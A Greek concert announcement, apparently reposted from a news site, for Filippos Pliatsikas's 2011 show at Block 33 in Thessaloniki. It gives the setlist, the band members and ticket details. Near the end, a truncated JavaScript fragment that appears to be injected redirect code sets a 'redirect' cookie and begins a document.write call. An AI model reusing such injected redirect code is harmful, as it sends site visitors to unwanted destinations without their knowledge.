Ο Φίλιππος Πλιάστικας στη Θεσσαλονίκη στις 19/2

Ο Φίλιππος Πλιάτσικας επιστρέφει στην ελληνική μουσική επικαιρότητα στη Θεσσαλονίκη για μία μοναδική συναυλία, αγκαλιά με έναν νέο, ακόμα πιο ηλεκτρικό δίσκο, με τίτλο «Την αλήθεια Να Πω» και βέβαια, με αγαπημένες μελωδίες του παρελθόντος, που κρατούν από τα χρόνια των Πυξ Λαξ.

Στη μία και μοναδική συναυλία που θα δώσει αυτόν τον χειμώνα στη Θεσσαλονίκη, το Σάββατο 19 Φεβρουαρίου 2011 στο Βlock 33, θα μοιραστεί την αλήθεια «του» μαζί μας, σε μια εποχή που η αλήθεια είναι το ζητούμενο και το ψέμα έχει στρέψει όλα του τα φώτα πάνω μας και μας κλείνει το μάτι. Θα μας μιλήσει με τα τραγούδια του για τη ζωή, για έναν κόσμο που δεν έχει σύνορα, δεν έχει τείχη. Για έναν κόσμο που η μουσική δεν έχει ταμπέλες και δεν περιχαρακώνεται. Μας τραγουδά για την αγάπη που μας τρέφει, που μας πληγ ώνει, που μας ενώνει. Για το μυστήριο μπαρ της ζωής που μας παίζει παιχνίδια, μας τσακίζει, μας εξορίζει, που αγωνίζεται, που ονειρεύεται και ελπίζει.

Με γεμάτες τις αποσκευές, με τραγούδια όπως το ολοκαίνουριο «Μια γρατζουνιά για να θυμάσαι», αλλά και τα δοκιμασμένα «Έπαψες αγάπη να θυμίζεις», «Ποιος έχει λόγο στην αγάπη», «Μοναξιά μου όλα», «Τι δεν έμαθε ο Θεός», «Αν θα μπορούσα τον κόσμο να άλλαζα», «Όλο μ’ αφήνεις να σ’ αφήσω» θα ξεδιπλώσει τη μουσική του πραμάτεια και θα μας αποκαλύψει παλιούς και κυρίως νέους θησαυρούς. Σε αυτές τις μουσικές περιπλανήσεις δεν θα είναι μόνος. Μαζί του μια ομάδα εξαιρετικών μουσικών: ο Αλέκος Αράπης στο μπάσο, ο Παναγιώτης Σπυρόπουλος στην ηλεκτρική κιθάρα, ο Γιώργος Γιαννόπουλος στα τύμπανα και ο Βασίλης Σπυρόπουλος στην ηλεκτρική κιθάρα. Η ενορχήστρωση των τραγουδιών πιο ηλεκτρική από ότι μας έχει συνηθίσει έως τώρα. Και, το Block 33 προσφέροντας στον καλλιτέχνη τη μεγαλύτερη δυνατή αμεσότητα με το κοινό το υ, είναι, όπως πάντα, έτοιμο να φιλοξενήσει αυτήν τη συναυλία και μαζί της όλους εμάς, το Σάββατο 19 Φεβρουαρίου 2011.

Ώρα έναρξης: 21:30

Η προπώληση των εισιτηρίων έχει ξεκινήσει !

Τιμές εισιτηρίων
Η τιμή των εισιτηρίων είναι 12 € και 15 €

Σημεία Προπώλησης

Ticket House

Αθήνα
Πανεπιστημίου 42 (εντός της στοάς), Τηλ.: 210 3608 366

Θεσσαλονίκη
Μητροπόλεως 102, Τηλ.: 2310 264880

ΙΑΝΟΣ
Θεσσαλονίκη: Πλατεία Αριστοτέλους 7, Τηλ.: 2310 277 004

Online Sales ή αγορές με πιστωτική κάρτα, 24 ώρες/ωρο:
www.ticketpro.gr | www.tickethouse.gr

Για την αγορά εισιτηρίων μέσω internet ή μέσω πιστωτικής κάρτας υπάρχει επιβάρυνση 10% στην τιμή του εισιτηρίου.

BLOCK 33
26ης Οκτωβρίου 33
Περιοχή : Σφαγεία Θεσσαλονίκης
τηλ.2310533533

πηγή:kouinet.gr
te.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(‘

You may also like...

Leave a Reply